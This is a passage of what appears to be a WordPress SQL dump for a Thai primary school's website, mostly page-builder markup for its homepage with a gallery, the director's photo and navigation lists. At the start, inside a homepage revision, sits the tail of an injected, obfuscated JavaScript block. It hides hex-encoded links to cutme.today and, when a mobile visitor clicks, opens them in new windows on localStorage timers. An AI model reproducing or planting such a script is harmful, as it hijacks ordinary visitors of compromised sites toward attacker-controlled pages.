',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 11:53:09','2024-07-27 04:53:09','',14,'http://pakhaeng.ssk.in.th/?p=110',0,'revision','',0),
(112,1,'2024-07-27 12:01:18','2024-07-27 05:01:18','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#6096b4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 